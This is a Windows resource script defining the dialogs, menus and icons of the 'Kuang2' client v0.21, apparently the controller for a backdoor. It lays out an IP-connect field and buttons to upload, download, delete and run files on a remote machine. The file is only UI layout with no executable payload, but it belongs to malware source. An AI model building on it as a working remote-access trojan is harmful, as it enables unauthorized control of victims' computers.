#include <windows.h>
#include "k2c.h"

AAA		ICON "aaa.ico"
DOC		ICON "doc.ico"
FOLDER	ICON "folder_c.ico"
FOLDERX ICON "folder_x.ico"
SYSTEM	ICON "computer.ico"


KUANG_DIALOG DIALOGEX MOVEABLE IMPURE LOADONCALL DISCARDABLE 10, 10, 170, 165
STYLE DS_MODALFRAME | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_SYSMENU | WS_VISIBLE | WS_POPUP | WS_THICKFRAME
CAPTION "Kuang2: client v0.21"
FONT 8, "MS Sans Serif"
BEGIN
	LTEXT			"IP address:", ID_STATIC, 4,6,40,8, SS_LEFT
	EDITTEXT		ID_EDIT, 4,16,60,12, ES_LEFT
	PUSHBUTTON		"&Connect", ID_BUTTON, 72,16,36,12
	LTEXT			"<weird173@yahoo.com>", ID_STATUS,4,34,165,8, SS_LEFT
	CONTROL			"Tree View", ID_TV, "SysTreeView32", TVS_HASLINES | TVS_HASBUTTONS | TVS_LINESATROOT | WS_BORDER | WS_TABSTOP | TVS_SHOWSELALWAYS, 0,48,170,84
	EDITTEXT		ID_ENAME, 4,136,161,12, ES_LEFT | ES_AUTOHSCROLL
	PUSHBUTTON		"&Upload", ID_BUTTON_UP, 4,152,36,12
	PUSHBUTTON		"&Download", ID_BUTTON_DOWN, 44,152,36,12
	PUSHBUTTON		"De&lete", ID_BUTTON_DEL,  84,152,36,12
	PUSHBUTTON		"&Run", ID_BUTTON_RUN, 124,152,36,12
	PUSHBUTTON		"&Anti-Virus", ID_BUTTON_CLEAN, 120,8,40,20
END


RUN_DIALOG DIALOGEX MOVEABLE IMPURE LOADONCALL DISCARDABLE	10, 10, 150, 34, 0
STYLE DS_MODALFRAME | WS_CAPTION | WS_SYSMENU | WS_VISIBLE | WS_POPUP
CAPTION "Run remote file"
FONT 8, "MS Sans Serif"
BEGIN
	LTEXT			"Command line:", ID_STATIC_R, 4,4,72,8, SS_LEFT
	EDITTEXT		ID_EDIT_R, 4,16,112,12, ES_AUTOHSCROLL | ES_LEFT
	DEFPUSHBUTTON	"&Run", ID_BUTTON_R,  120,16,28,12
END


UPLOAD_DIALOG DIALOGEX MOVEABLE IMPURE LOADONCALL DISCARDABLE	10, 10, 150, 34, 0
STYLE DS_MODALFRAME | WS_CAPTION | WS_SYSMENU | WS_VISIBLE | WS_POPUP
CAPTION "Upload: remote file"
FONT 8, "MS Sans Serif"
BEGIN
	LTEXT			"Upload folder:", ID_STATIC_U, 4,4,72,8, SS_LEFT
	EDITTEXT		ID_EDIT_U, 4,16,112,12, ES_AUTOHSCROLL | ES_LEFT
	DEFPUSHBUTTON	"&Upload", ID_BUTTON_U,  120,16,28,12
END


POPUP_FOLDER MENU DISCARDABLE
BEGIN
	POPUP "K2 Popup folder"
	BEGIN
		MENUITEM "&Expand/Colapse",         IDM_EXPAND
		MENUITEM "Mark as &Unseen",         IDM_UNSEEN
	END
END

POPUP_UFOLDER MENU DISCARDABLE
BEGIN
	POPUP "K2 Popup unseen folder"
	BEGIN
		MENUITEM "&Expand/Colapse",         IDM_EXPAND
	END
END

POPUP_FILE MENU DISCARDABLE
BEGIN
	POPUP "K2 Popup file"
	BEGIN
		MENUITEM "&Download",               IDM_DOWNLOAD
		MENUITEM "De&lete",                 IDM_DELETE
		MENUITEM "&Run",                    IDM_RUN
	END
END


SMALL_DIALOG DIALOG -40, 30, 200, 66
STYLE WS_CAPTION | WS_VISIBLE | WS_SYSMENU | WS_THICKFRAME | WS_POPUP | DS_MODALFRAME
CAPTION "Scanning local system"
FONT 10, "System"
BEGIN
	LISTBOX		ID_LISTBOX, 0,0,200,70, WS_VSCROLL | WS_HSCROLL | WS_TABSTOP | LBS_NOSEL
END
